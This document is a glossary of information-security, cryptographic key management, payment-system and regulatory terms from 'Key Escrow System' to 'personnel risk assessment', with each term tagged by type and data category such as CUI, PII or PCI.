Key Escrow SystemnounA system that entrusts the two components comprising a cryptographic key (e.g., a device unique key) to two key component holders (also called "escrow agents").SystemRegulatedCUI
Key ExpansionnounRoutine used to generate a series of Round Keys from the Cipher Key.ProcessRegulated
Key fobnounA small portable device equipped with chip technology allowing the holder the ability to access network systems, such as those used for payments, and to store personal data.PhysicalRegulatedPII
Key Generation MaterialnounRandom numbers, pseudo-random numbers, and cryptographic parameters used in generating cryptographic keys.DataRegulatedCUI
Key ListnounPrinted series of key settings for a specific cryptonet. Key lists may be produced in list, pad, or printed tape format.ArtifactRegulatedCUI
Key LoadernounA self-contained unit that is capable of storing at least one plaintext or encrypted cryptographic key or a component of a key that can be transferred, upon request, into a cryptographic module.PhysicalRegulatedCUI
Key ManagementnounThe activities involving the handling of cryptographic keys and other related security parameters (e.g., IVs and passwords) during the entire life cycle of the keys, including their generation, storage, establishment, entry and output, and zeroization.ProcessRegulatedCUI
Key Management InfrastructurenounAll parts – computer hardware, firmware, software, and other equipment and its documentation; facilities that house the equipment and related functions; and companion standards, policies, procedures, and doctrine that form the system that manages and supports the ordering and delivery of cryptographic material and related information products and services to users.SystemRegulatedCUI
key resourcenounA publicly or privately controlled asset necessary to sustain continuity of government and/or economic operations, or an asset that is of great historical significance.PhysicalRegulated
Key TagnounIdentification information associated with certain types of electronic key.ArtifactRegulatedCUI
Key TapenounPunched or magnetic tape containing key. Printed key in tape form is referred to as a key list.PhysicalRegulatedCUI
Key TransportnounThe secure transport of cryptographic keys from one cryptographic module to another module.ProcessRegulated
Keyed-hash based message authentication codenounA message authentication code that uses a cryptographic key in conjunction with a hash function.ControlRegulated
Keystroke MonitoringnounThe process used to view or record both the keystrokes entered by a computer user and the computer’s response during an interactive session. Keystroke monitoring is usually considered a special case of audit trails.ProcessRegulatedCUI
KMI Operating AccountnounA KMI business relationship that is established 1) to manage the set of user devices that are under the control of a specific KMI customer organization, and 2) to control the distribution of KMI products to those devices.OrganizationRegulatedCUI
KMI Protected ChannelnounA KMI Communication Channel that provides 1) Information Integrity Service; 2) either Data Origin Authentication Service or Peer Entity Authentication Service, as is appropriate to the mode of communications; and 3) optionally, Information Confidentiality Service.NetworkRegulatedCUI
KMI-Aware DevicenounA user device that has a user identity for which the registration has significance across the entire KMI (i.e., the identity’s registration data is maintained in a database at the PRSN level of the system, rather than only at an MGC) and for which a product can be generated and wrapped by a PSN for distribution to the specific device.SystemRegulatedCUI
KOA AgentnounA user identity that is designated by a KOA manager to access PRSN product delivery enclaves for the purpose of retrieving wrapped products that have been ordered for user devices that are assigned to that KOA.IdentityRegulatedCUI
KOA ManagernounThe Management Role that is responsible for the operation of one or KOA’s (i.e., manages distribution of KMI products to the end cryptographic units, fill devices, and ADPs that are assigned to the manager’s KOA).RoleRegulatedCUI
KOA Registration ManagernounThe individual responsible for performing activities related to registering KOAs.RoleRegulated
Labeled Security ProtectionsnounAccess control protection features of a system that use security labels to make access control decisions.ControlRegulated
Laboratory AttacknounUse of sophisticated signal recovery equipment in a laboratory environment to recover information from data storage media.ThreatRegulatedCUI
Large value funds transfer systemnounA wholesale payment system used primarily by financial institutions in which large values of funds are transferred between parties. Fedwire® and CHIPS are the two large-value transfer systems in the United States.SystemRegulated
Level of ConcernnounRating assigned to an information system indicating the extent to which protection measures, techniques, and procedures must be applied. High, Medium, and Basic are identified levels of concern. A separate Level-of-Concern is assigned to each information system for confidentiality, integrity, and availability.MetricRegulatedCUI
Level of ProtectionnounExtent to which protective measures, techniques, and procedures must be applied to information systems and networks based on risk, threat, vulnerability, system interconnectivity considerations, and information assurance needs. Levels of protection are: 1. Basic: information systems and networks requiring implementation of standard minimum security countermeasures. 2. Medium: information systems and networks requiring layering of additional safeguards above the standard minimum security countermeasures. 3. High: information systems and networks requiring the most stringent protection and rigorous security countermeasures.RequirementRegulatedCUI
Line ConductionnounUnintentional signals or noise induced or conducted on a telecommunications or information system signal, power, control, indicator, or other external interface line.VulnerabilityRegulatedCUI
Local AuthoritynounOrganization responsible for generating and signing user certificates in a PKI-enabled environment.OrganizationRegulated
Local Management Device/Key ProcessornounEKMS platform providing automated management of COMSEC material and generating key for designated users.SystemRegulatedCUI
Local Registration AuthoritynounA Registration Authority with responsibility for a local community in a PKI-enabled environment.OrganizationRegulatedCUI
locally mounted hardwarenounHardware installed inside the perimeter of a defined location. This includes but is not limited to motion sensors, electronic lock control mechanisms, and badge readers.PhysicalRegulated
LockboxnounDeposit mechanism used by commercial firms and businesses to facilitate their deposit transaction volume. Typically, commercial firms and businesses direct customers to send payments directly to a financial institution address or post office box controlled by the institution. Financial institution personnel record payments received and prepare deposit slips, and subsequent processing proceeds as with other deposit taking activities.PhysicalRegulatedPCI
Log ClippingnounLog clipping is the selective removal of log entries from a system log to hide a compromise.ThreatRegulatedCUI
log managementnounThe process for generating, transmitting, storing, analyzing, and disposing of log data.ProcessRegulated
Logic BombnounA piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met.ThreatRegulated
logical securitynounLogical Security consists of software safeguards for an organization's systems, including user identification and password access, authenticating, access rights and authority levels. These measures are to ensure that only authorized users are able to perform actions or access information in a network or a workstation.ControlRegulated
Long positionnounIn respect of a currency balance that is greater than zero, the amount by which such currency balance is greater than zero. A position that appreciates in value if market prices increase. When one buys a currency, their position is long.MetricRegulated
Low ImpactnounThe loss of confidentiality, integrity, or availability that could be expected to have a limited adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; (i.e., 1) causes a degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is noticeably reduced; 2) results in minor damage to organizational assets; 3) results in minor financial loss; or 4) results in minor harm to individuals).RequirementRegulated
low impact Bulk Electric System Cyber SystemnounA Bulk Electric System Cyber System in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a potential impact value of low, and none are assigned a potential impact value of medium or high.SystemRegulatedCUI
Low Impact Bulk Electric System Cyber System Electronic Access PointnounA Cyber Asset interface that controls Low Impact External Routable Connectivity. The Cyber Asset containing the LEAP may reside at a location external to the asset or assets containing low impact Bulk Electric System (BES) Cyber Systems.SystemRegulatedCUI
Low Impact External Routable ConnectivitynounDirect user-initiated interactive access or a direct device-to-device connection to a low impact BES Cyber System(s) from a Cyber Asset outside the asset containing those low impact BES Cyber System(s) via a bi-directional routable protocol connection. Point-to-point communications between intelligent electronic devices that use routable communication protocols for time-sensitive protection or control functions between Transmission station or substation assets containing low impact BES Cyber Systems are excluded from this definition (examples of this communication include, but are not limited to, IEC 61850 GOOSE or vendor proprietary protocols).NetworkRegulatedCDI
Low Probability of DetectionnounResult of measures used to hide or disguise intentional electromagnetic transmissions.ControlRegulatedCUI
Low Probability of InterceptnounResult of measures to prevent the intercept of intentional electromagnetic transmissions. The objective is to minimize an adversary’s capability of receiving, processing, or replaying an electronic signal.ControlRegulatedCUI
Low-Impact SystemnounAn information system in which all three security objectives (i.e., confidentiality, integrity, and availability) are assigned a FIPS 199 potential impact value of low.SystemRegulated
Magnetic ink character recognition (MICR)nounMagnetic codes found on the bottom of checks, deposit slips, and general ledger debit and credit tickets that allow a machine to scan (capture) the information. MICR encoding on a check includes the account number, the routing number, the serial number of the check, and the amount of the check. The amount of the check is encoded when the proof department processes the check.DataRegulatedPII
Magnetic RemanencenounMagnetic representation of residual information remaining on a magnetic medium after the medium has been cleared. See Clearing.VulnerabilityRegulatedCUI
Maintenance HooknounSpecial instructions (trapdoors) in software allowing easy maintenance and additional feature development. Since maintenance hooks frequently allow entry into the code without the usual checks, they are a serious security risk if they are not removed prior to live implementation.VulnerabilityRegulatedCUI
Major ApplicationnounAn application that requires special attention to security due to the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of the information in the application. Note: All federal applications require some level of protection. Certain applications, because of the information in them, however, require special management oversight and should be treated as major. Adequate security for other applications should be provided by security of the systems in which they operate.SystemRegulatedCUI
Major Information SystemnounAn information system that requires special management attention because of its importance to an agency mission; its high development, operating, or maintenance costs; or its significant role in the administration of agency programs, finances, property, or other resources.SystemRegulatedCUI
malicious actnounAn intentional, wrongful act performed against another without legal justification or excuse.ThreatRegulated
malicious activitynounActivity with a harmful intent, such as fraud, theft, blackmail, vandalism, looting, sabotage, etc.ThreatRegulated
malicious codenounSoftware or firmware intended to perform an unauthorized process that will have adverse impact on the confidentiality, integrity, or availability of an information system. A virus, worm, Trojan horse, or other code-based entity that infects a host. Spyware and some forms of adware are also examples of malicious code.ThreatRegulated
Malicious Code PreventionnounThis purpose of policy is to prevent malicious code attacks from happening, and if they should happen, to quarantine the infected systems and eradicate the malicious code before it spreads further.ControlRegulated
malicious logicnounHardware, firmware, or software that is intentionally included or inserted in a system for a harmful purpose.ThreatRegulated
management authorizationnounOfficial permission or approval given by the senior executives of an organization.RequirementRegulated
Management ClientnounA configuration of a client node that enables a KMI external operational manager to manage KMI products and services by either 1) accessing a PRSN, or 2) exercising locally provided capabilities. An MGC consists of a client platform and an advanced key processor (AKP).SystemRegulatedCUI
Mandatory ModificationnounChange to a COMSEC end-item that NSA requires to be completed and reported by a specified date. See Optional Modification.ControlRegulatedCUI
Manipulative Communications DeceptionnounAlteration or simulation of friendly telecommunications for the purpose of deception. See Communications Deception and Imitative Communications Deception.ThreatRegulatedCUI
Manual CryptosystemnounCryptosystem in which the cryptographic processes are performed without the use of crypto-equipment or auto-manual devices.SystemRegulatedCUI
Manual Key TransportnounA non-automated means of transporting cryptographic keys by physically moving a device, document, or person containing or possessing the key or key component.ProcessRegulatedCUI
Manual Remote RekeyingnounProcedure by which a distant crypto-equipment is rekeyed electronically, with specific actions required by the receiving terminal operator. Synonymous with cooperative remote rekeying. See also Automatic Remote Keying.ProcessRegulatedCUI
Master Cryptographic Ignition KeynounKey device with electronic logic and circuits providing the capability for adding more operational CIKs to a keyset.PhysicalRegulatedCUI
Match/matchingnounThe process of comparing biometric information against a previously stored template(s) and scoring the level of similarity.ProcessRegulatedPII
Matched instructionsnounTwo Instructions in which the information set forth in a specific CLS Bank Rule is matched in accordance with the parameters and procedures set forth in the CLS Bank Rules.ArtifactRegulated
MatchingnounWith respect to compared and non-compared transactions, the process of comparing the trade or settlement details provided by counterparties to ensure they agree with respect to the terms of the transaction. Also called comparison checking.ProcessRegulated
material changenounA change in the affairs of a company that is expected to have a significant effect on the market value of its securities - such as a change in the nature of the business, a change in the Board of Directors or the principal officers, a change in the share ownership of the company that could affect control, or the acquisition or disposition of any securities in another company. A material change must be reported to the applicable self-regulatory organization.EventRegulated
MedianounPhysical devices or writing surfaces including but not limited to magnetic tapes, optical disks, magnetic disks, Large Scale Integration (LSI) memory chips, and printouts (but not including display media) onto which information is recorded, stored, or printed within an information system.PhysicalRegulated
Media SanitizationnounA general term referring to the actions taken to render data written on media unrecoverable by both ordinary and extraordinary means.ProcessRegulated
medium impact Bulk Electric System Cyber SystemnounA Bulk Electric System Cyber System in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a potential impact value of medium, and none are assigned a potential impact value of high.SystemRegulatedCUI
Merchant acquirernounBankcard association members that initiate and maintain contractual agreements with merchants for the purpose of accepting and processing bankcard transactions.OrganizationRegulatedPCI
Merchant processingnounActivity for the acceptance and settlement of bankcard products and transactions from merchants through the payment system.ProcessRegulatedPCI
Message IndicatornounSequence of bits transmitted over a communications system for synchronizing cryptographic equipment.DataRegulatedCUI
methodnounA means or particular procedure for accomplishing or approaching something.ProcessRegulated
migrationnounThe purpose of this task is to move records from one system or storage medium to another while maintaining authenticity, integrity, reliability, and usability.ProcessRegulated
Minor ApplicationnounAn application, other than a major application, that requires attention to security due to the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of the information in the application. Minor applications are typically included as part of a general support system.SystemRegulated
Misnamed FilesnounA technique used to disguise a file’s content by changing the file’s name to something innocuous or altering its extension to a different type of file, forcing the examiner to identify the files by file signature versus file extension.ThreatRegulated
Mission Assurance CategorynounA Department of Defense Information Assurance Certification and Accreditation Process (DIACAP) term primarily used to determine the requirements for availability and integrity.RequirementRegulatedCDI
Mission CriticalnounAny telecommunications or information system that is defined as a national security system (Federal Information Security Management Act of 2002 - FISMA) or processes any information the loss, misuse, disclosure, or unauthorized access to or modification of, would have a debilitating impact on the mission of an agency.RequirementRegulatedCUI
mobile codenounSoftware programs or parts of programs obtained from remote information systems, transmitted across a network, and executed on a local information system without explicit installation or execution by the recipient. Note: Some examples of software technologies that provide the mechanisms for the production and use of mobile code include Java, JavaScript, ActiveX, VBScript, etc.ThreatRegulated
mobile devicenounPortable cartridge/disk-based, removable storage media (e.g., floppy disks, compact disks, USB flash drives, external hard drives, and other flash memory cards/drives that contain nonvolatile memory). Portable computing and communications device with information storage capability (e.g., notebook/laptop computers, personal digital assistants, cellular telephones, digital cameras, and audio recording devices).PhysicalRegulated
Mobile financial servicesnounThe products and services that a financial institution provides to its customers through mobile devices.CapabilityRegulatedPII
Mobile sitenounThe use of a mobile/temporary facility to serve as a business resumption location The facility can usually be delivered to any site and can house information technology and staff.PhysicalRegulated
Mode of OperationnounDescription of the conditions under which an information system operates based on the sensitivity of information processed and the clearance levels, formal access approvals, and need-to-know of its users. Four modes of operation are authorized for processing or transmitting information: dedicated mode, system high mode, compartmented/partitioned mode, and multilevel mode.RequirementRegulatedCUI
Moderate ImpactnounThe loss of confidentiality, integrity, or availability that could be expected to have a serious adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; (i.e., 1) causes a significant degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; 2) results in significant damage to organizational assets; 3) results in significant financial loss; or 4) results in significant harm to individuals that does not involve loss of life or serious life threatening injuries).MetricRegulatedCUI
Moderate-Impact SystemnounAn information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a FIPS 199 potential impact value of moderate and no security objective is assigned a FIPS 199 potential impact value of high.SystemRegulated
Multi-ReleasablenounA characteristic of an information domain where access control mechanisms enforce policy-based release of information to authorized users within the information domain.RequirementRegulatedCUI
Multilateral netting settlement systemnounMultilateral netting is an arrangement among three or more parties to net their obligations. In these settlement systems transfers are irrevocable but are only final after the completion of end-of-day-settlement.SystemRegulated
Multilevel DevicenounEquipment trusted to properly maintain and separate data of different security domains.SystemRegulatedCUI
Multilevel ModenounMode of operation wherein all the following statements are satisfied concerning the users who have direct or indirect access to the system, its peripherals, remote terminals, or remote hosts: 1) some users do not have a valid security clearance for all the information processed in the information system; 2) all users have the proper security clearance and appropriate formal access approval for that information to which they have access; and 3) all users have a valid need-to-know only for information to which they have access.ProcessRegulatedCUI
Multilevel SecuritynounConcept of processing information with different classifications and categories that simultaneously permits access by users with different security clearances and denies access to users who lack authorization.CapabilityRegulatedCUI
Multiple Security LevelsnounCapability of an information system that is trusted to contain, and maintain separation between, resources (particularly stored data) of different security domains.CapabilityRegulatedCUI
multiple sourcesnounInformation classified based on two or more source documents, classification guides or combination of both.DataRegulatedCUI
National Information Assurance PartnershipnounA U.S. government initiative established to promote the use of evaluated information systems products and champion the development and use of national and international standards for information technology security. NIAP was originally established as a collaboration between the National Institute of Standards and Technology (NIST) and the National Security Agency (NSA) in fulfilling their respective responsibilities under P.L. 100-235 (Computer Security Act of 1987). NIST officially withdrew from the partnership in 2007 but NSA continues to manage and operate the program. The key operational component of NIAP is the Common Criteria Evaluation and Validation Scheme (CCEVS) which is the only U.S. government-sponsored and endorsed program for conducting internationally recognized security evaluations of commercial off-the-shelf (COTS) Information Assurance (IA) and IA-enabled information technology products. NIAP employs the CCEVS to provide government oversight or “validation” to U.S. CC evaluations to ensure correct conformance to the International Common Criteria for IT Security Evaluation (ISO/IEC 15408).OrganizationRegulated
National Information InfrastructurenounNationwide interconnection of communications networks, computers, databases, and consumer electronics that make vast amounts of information available to users. It includes both public and private networks, the Internet, the public switched network, and cable, wireless, and satellite communications.NetworkRegulated
National Security Emergency Preparedness Telecommunications ServicesnounTelecommunications services that are used to maintain a state of readiness or to respond to and manage any event or crisis (local, national, or international) that causes or could cause injury or harm to the population, damage to or loss of property, or degrade or threaten the national security or emergency preparedness posture of the United States.CapabilityRegulatedCUI
National Security InformationnounInformation that has been determined pursuant to Executive Order 12958 as amended by Executive Order 13292, or any predecessor order, or by the Atomic Energy Act of 1954, as amended, to require protection against unauthorized disclosure and is marked to indicate its classified status.DataRegulatedCUI
National Security SystemnounAny information system (including any telecommunications system) used or operated by an agency or by a contractor of any agency, or other organization on behalf of an agency, the function, operation, or use of which: I. involves intelligence activities; II. involves cryptologic activities related to national security; III. Involves command and control of military forces; IV. involves equipment that is an integral part of a weapon or weapon system; or V. subject to subparagraph (B), is critical to the direct fulfillment of military or intelligence missions; or is protected at all times by procedures established for information that have been specifically authorized under criteria established by an Executive Order or an Act of Congress to be kept classified in the interest of national defense or foreign policy. Subparagraph (B). Does not include a system that is to be used for routine administrative and business applications (including payroll, finance, logistics, and personnel management applications). (Title 44 U.S. Code Section 3542, Federal Information Security Management Act of 2002.)SystemRegulatedCUI
National Settlement Service (NSS)nounAlso referred to as Deferred Net Settlement. The Federal Reserve Banks' multilateral settlement service. NSS is offered to depository institutions that settle for participants in clearinghouses, financial exchanges, and other clearing and settlement groups. Settlement agents acting on behalf of those depository institutions electronically submit settlement files to the Federal Reserve Banks. Files are processed on receipt, and entries are automatically posted to the depository institutions' Reserve Bank accounts. Entries are final when posted.OrganizationRegulated
National Vulnerability DatabasenounThe U.S. government repository of standards-based vulnerability management data. This data enables automation of vulnerability management, security measurement, and compliance (e.g., FISMA).VulnerabilityRegulated
need to knownounAn administrative action officially declaring a particular individual requires access to specified sensitive or classified information in order to perform their assigned duties.RequirementRegulatedCUI
Need To Know DeterminationnounDecision made by an authorized holder of official information that a prospective recipient requires access to specific official information to carry out official duties.ProcessRegulatedCUI
negative effectnounA measure, expressed as a function of the likelihood that an event may occur, how fast the event may impact objectives and the estimated negative impact that an event may have on objectives or the impact that an event had on objectives.MetricRegulated
Net debit capnounThe maximum dollar amount of uncollateralized daylight overdrafts that an institution is authorized to incur in its Federal Reserve account. The net debit cap is generally equal to an institution's capital times the cap multiple for its cap category.RequirementRegulated
network portnounA network port is a process-specific or an application-specific software construct serving as a communication endpoint, which is used by the Transport Layer protocols of Internet Protocol suite, such as User Diagram Protocol (UDP) and Transmission Control Protocol (TCP).NetworkRegulated
no longer needed for legal, regulatory, or business reasonnounSomething that is not needed anymore for business, regulatory, or legal reasons.RequirementRegulated
No-Lone ZonenounArea, room, or space that, when staffed, must be occupied by two or more appropriately cleared individuals who remain within sight of each other. See Two-Person Integrity.ControlRegulatedCUI
non-compliancenounThe failure to achieve performance criteria of a regulation or authority.FindingRegulated
non-compliance informationnounInformation regarding a failure to act in accordance with applicable standards and regulations.FindingRegulatedCUI
Non-Local MaintenancenounMaintenance activities conducted by individuals communicating through a network; either an external network (e.g., the Internet) or an internal network.ProcessRegulated
noticenounAny documented (in print or electronic format) notice or notification to another person by taking such steps as may be reasonably required to inform the other person in ordinary course, whether or not the other person actually comes to know of it.ArtifactRegulated
notificationnounThe act of giving notice of or reporting something formally or officially.EventRegulated
notification requirementnounThe obligation to officially inform a party of something important.RequirementRegulated
NullnounDummy letter, letter symbol, or code group inserted into an encrypted message to delay or prevent its decryption or to complete encrypted groups for transmission or transmission security purposes.ControlRegulatedCUI
Null SessionnounKnown as Anonymous Logon, it is a way of letting an anonymous user retrieve information such as user names and shares over the network or connect without authentication. It is used by applications such as explorer.exe to enumerate shares on remote servers.VulnerabilityRegulated
Object IdentifiernounA specialized formatted number that is registered with an internationally recognized standards organization. The unique alphanumeric/numeric identifier registered under the ISO registration standard to reference a specific object or object class. In the federal government PKI, they are used to uniquely identify each of the four policies and cryptographic algorithms supported.ArtifactRegulatedCUI
Object ReusenounReassignment and reuse of a storage medium containing one or more objects after ensuring no residual data remains on the storage medium.ControlRegulated
Off-CardnounRefers to data that is not stored within the PIV card or computation that is not done by the Integrated Circuit Chip (ICC) of the PIV card.DataRegulatedCUI
Office of Foreign Asset Control (OFAC)nounThe Office of Foreign Assets Control, United States Department of the Treasury, administers and enforces economic sanctions programs primarily against countries and groups of individuals such as terrorists and narcotics traffickers. The sanctions can be either comprehensive or selective, using the blocking of assets and trade restrictions to accomplish foreign policy and national security goals.OrganizationRegulated
Office of Foreign Assets Control (OFAC)nounThe Office of Foreign Assets Control, Department of the Treasury, administers and enforces economic sanctions programs primarily against countries and groups of individuals such as terrorists and narcotics traffickers. The sanctions can be either comprehensive or selective, using the blocking of assets and trade restrictions to accomplish foreign policy and national security goals.OrganizationRegulated
Official InformationnounAll information in the custody and control of a U.S. government department or agency that was acquired by U.S. government employees as a part of their official duties or because of their official status and has not been cleared for public release.DataRegulatedCUI
offsite backupnounA backup process or facility that stores backup data or applications external to the organization or core IT environmentProcessRegulated
Offsite rotationnounUsed for backup and/or disaster recovery; moving a copy of the most current database, information, file, or tape to an offsite storage facility to be used only in an emergency.ProcessRegulated
On-CardnounRefers to data that is stored within the PIV card or computation that is done by the ICC of the PIV card.DataRegulatedCUI
On-us checksnounChecks that are deposited into the same institution on which they are drawn.DataRegulatedPII
One-time TapenounPunched paper tape used to provide key streams on a one-time basis in certain machine cryptosystems.PhysicalRegulatedCUI
Online AttacknounAn attack against an authentication protocol where the Attacker either assumes the role of a Claimant with a genuine Verifier or actively alters the authentication channel. The goal of the attack may be to gain authenticated access or learn authentication secrets.ThreatRegulated
Online CryptosystemnounCryptographic system in which encryption and decryption are performed in association with the transmitting and receiving functions.CapabilityRegulated
online terminalnounA web-browser-based access to an acquirer, processor or third party service provider website to authorize payment card transactions, where the merchant manually enters payment card data via a securely connected web browser. Unlike physical terminals, virtual payment terminals do not read data directly from a payment card. Because payment card transactions are entered manually, virtual payment terminals are typically used instead of physical terminals in merchant environments with low transaction volumes.SystemRegulatedPCI
Open StoragenounAny storage of classified national security information outside of approved containers. This includes classified information that is resident on information systems media and outside of an approved storage container, regardless of whether or not that media is in use (i.e., unattended operations).FindingRegulatedCUI
operational controlnounThe day-to-day security procedures and mechanisms to protect operational systems. The operational controls consist of the physical, environmental and personnel security controls. These controls deal with the everyday operation of a company or organization to ensure all objectives are achieved.ControlRegulated
Operational KeynounKey intended for use over-the-air for protection of operational information or for the production or secure electrical transmission of key streams.CredentialRegulatedCUI
operational resiliencenounThe ability of an FMI to: (i) maintain essential operational capabilities under adverse conditions or stress, even if in a degraded or debilitated state; and (ii) recover to effective operational capability in a time frame consistent with the provision of critical economic services.CapabilityRegulated
Operational risknounThe risk of failure or loss resulting from inadequate or failed processes, people, or systems.ThreatRegulated
Operational Vulnerability InformationnounInformation that describes the presence of an information vulnerability within a specific operational setting or network.VulnerabilityRegulatedCUI
Operational WaivernounAuthority for continued use of unmodified COMSEC end-items pending the completion of a mandatory modification.RequirementRegulatedCUI
Operations CodenounCode composed largely of words and phrases suitable for general communications use.ArtifactRegulatedCUI
Operations SecuritynounSystematic and proven process by which potential adversaries can be denied information about capabilities and intentions by identifying, controlling, and protecting generally unclassified evidence of the planning and execution of sensitive activities. The process involves five steps: identification of critical information, analysis of threats, analysis of vulnerabilities, assessment of risks, and application of appropriate countermeasures.ProcessRegulatedCUI
Operations TechnologynounThe hardware and software systems used to operate industrial control devices.SystemRegulated
Optional ModificationnounNSA-approved modification not required for universal implementation by all holders of a COMSEC end-item. This class of modification requires all of the engineering/doctrinal control of mandatory modification but is usually not related to security, safety, TEMPEST, or reliability. See Mandatory Modification.ControlRegulatedCUI
Organizational Registration AuthoritynounEntity within the PKI that authenticates the identity and the organizational affiliation of the users.OrganizationRegulatedPII
Originating depository financial institution (ODFI)nounA participating financial institution that originates entries at the request of and by agreement with its originators in accordance with the provisions of the NACHA rules.OrganizationRegulated
origination functionnounAny of the processes required to initiate an automated clearing house transaction.ProcessRegulatedPCI
OriginatornounA person that has authorized an ODFI to transmit a credit or debit entry to the deposit account of a receiver at an RDFI.IdentityRegulatedPII
Out-of-bandnounActivity outside of the primary means of interfacing with the customer. For example, if a user is performing activity online, he or she may be authenticated through a one-time password sent via text message.ControlRegulated
outsourced applicationnounAn application that is contracted out to an external provider for the development, deployment, and management.SystemRegulated
outsourcing arrangementnounA contract between the institution and an audit services firm to provide internal audit services.ProcessRegulated
Over-The-Air Key TransfernounElectronically distributing key without changing traffic encryption key used on the secured communications path over which the transfer is accomplished.ProcessRegulatedCUI
Over-The-Air RekeyingnounChanging traffic encryption key or transmission security key in remote cryptographic equipment by sending new key directly to the remote cryptographic equipment over the communications path it secures.ProcessRegulatedCUI
overdraftnounThe amount by which withdrawals exceed deposits, or the extension of credit by a lending institution to allow for such a situation.DataRegulatedPII
Partitioned Security ModenounInformation systems security mode of operation wherein all personnel have the clearance, but not necessarily formal access approval and need-to-know, for all information handled by an information system.RequirementRegulatedCUI
Passive WiretappingnounThe monitoring or recording of data while it is being transmitted over a communications link, without altering or affecting the data.ThreatRegulated
patch and vulnerability management processnounOne of the many process associated with the patching of software applications and the situations when an organization is forced to make emergency configuration changes that may reduce functionality to protect the organization from exploitation of the vulnerability.VulnerabilityRegulated
Paying banknounA paying bank is the institution where a check is payable and to which it is sent for payment.OrganizationRegulated
payment cardnounA range of different cards that can be used to access cash assets through point-of-sale terminals or other facilities in order to make payments, receive cash money, exchange currency and perform other actions determined by the card issuer and its terms.PhysicalRegulatedPCI
Payment systemnounThe mechanism, the rules, institutions, people, markets, and agreements that make the exchange of payments possible.SystemRegulatedPCI
Payments System Risk Policy (PSR)nounThe Federal Reserve's Payments System Risk (PSR) policy addressing the risks that payment systems present to the Federal Reserve Banks, the banking system, and to other sectors of the economy.RequirementRegulated
Payroll card accountnounA bank account that is established directly or indirectly by an employer on behalf of an employee to which an electronic funds transfers the employee's wages or compensation on a recurring basis. The payroll card, often branded by one of the credit/debit card associations, provides the employee access to the funds.DataRegulatedPII
PCI Security Standards CouncilnounThe governing body, representing key participants of the payment card industry, which establishes and maintains security standards for payment cards.OrganizationRegulatedPCI
PenetrationnounGaining unauthorized logical access to sensitive data by circumventing a system's protections.ThreatRegulated
Penetration testingnounSecurity testing in which evaluators mimic real-world attacks in an attempt to identify ways to circumvent the security features of an application, system, or network. Penetration testing often involves issuing real attacks on real systems and data, using the same tools and techniques used by actual attackers. Most penetration tests involve looking for combinations of vulnerabilities on a single system or multiple systems that can be used to gain more access than could be achieved through a single vulnerability.ProcessRegulated
Per-Call KeynounUnique traffic encryption key generated automatically by certain secure telecommunications systems to secure single voice or data transmissions. See Cooperative Key Generation.CredentialRegulatedCUI
Perimeternoun(C&A) Encompasses all those components of the system that are to be accredited by the DAA, and excludes separately accredited systems to which the system is connected. (Authorization) Encompasses all those components of the system or network for which a Body of Evidence is provided in support of a formal approval to operate.SystemRegulatedCUI
Periods ProcessingnounThe processing of various levels of classified and unclassified information at distinctly different times. Under the concept of periods processing, the system must be purged of all information from one processing period before transitioning to the next.ProcessRegulatedCUI
Person-to-person (P2P) paymentnounOnline payments using electronic mail messages to invoke a transfer of value between the parties over existing proprietary networks as on-us transactions.ProcessRegulatedPCI
Personal digital assistant (PDA)nounA pocket-sized, special-purpose personal computer that lacks a conventional keyboard.PhysicalRegulated
Personal identification numbernounA secret that a claimant memorizes and uses to authenticate his or her identity. PINs are generally only decimal digits.CredentialRegulatedPII
personal identification number informationnounInformation containing an account-holder's secret code that is used to verify the identity of their identity when trying to access a computer system, network, credit card account, ATM, etc.DataRegulatedPII
Personal Identifying Information / Personally Identifiable InformationnounThe information that permits the identity of an individual to be directly or indirectly inferred.DataRegulatedPII
Personal Identity VerificationnounThe process of creating and using a governmentwide secure and reliable form of identification for federal employees and contractors, in support of HSPD 12, Policy for a Common Identification Standard for Federal Employees and Contractors.ProcessRegulatedCUI
Personal Identity Verification AccreditationnounThe official management decision to authorize operation of a PIV Card Issuer after determining that the Issuer’s reliability has satisfactorily been established through appropriate assessment and certification processes.ProcessRegulatedCUI
Personal Identity Verification Authorizing OfficialnounAn individual who can act on behalf of an agency to authorize the issuance of a credential to an applicant.RoleRegulatedCUI
Personal Identity Verification CardnounPhysical artifact (e.g., identity card, “smart” card) issued to an individual that contains stored identity credentials (e.g., photograph, cryptographic keys, digitized fingerprint representation, etc.) such that a claimed identity of the cardholder may be verified against the stored credentials by another person (human-readable and verifiable) or an automated process (computer-readable and verifiable).PhysicalRegulatedCUI
Personal Identity Verification IssuernounAn authorized identity card creator that procures FIPS-approved blank identity cards, initializes them with appropriate software and data elements for the requested identity verification and access control application, personalizes the cards with the identity credentials of the authorized subjects, and delivers the personalized card to the authorized subjects along with appropriate instructions for protection and use.OrganizationRegulatedCUI
Personal Identity Verification RegistrarnounAn entity that establishes and vouches for the identity of an applicant to a PIV Issuer. The PIV RA authenticates the applicant’s identity by checking identity source documents and identity proofing, and that ensures a proper background check has been completed, before the credential is issued.OrganizationRegulatedPII
Personal Identity Verification SponsornounAn individual who can act on behalf of a department or agency to request a PIV Card for an applicant.RoleRegulatedCUI
Personally identifiable financial informationnounFor purposes of the Information Security Standards, personally identifiable financial information means information (i) a consumer provides to a financial institution to obtain a financial product or service; (ii) about a consumer resulting from any transaction involving a financial product or service between the financial institution and a consumer; or (iii) that a financial institution otherwise obtains about a consumer in connection with providing a financial product or service, such as account balance information, payment history, overdraft history, and credit or debit card purchase information; or the fact that an individual is one of the financial institution’s customers.DataRegulatedPII
Personally Identifiable InformationnounAny information about an individual maintained by an agency, including (1) any information that can be used to distinguish or trace an individual‘s identity, such as name, social security number, date and place of birth, mother‘s maiden name, or biometric records; and (2) any other information that is linked or linkable to an individual, such as medical, educational, financial, and employment information.DataRegulatedPII
personnel risk assessmentnounThe purpose of this task is to determine the risk that personnel pose to the organization.ProcessRegulatedPII
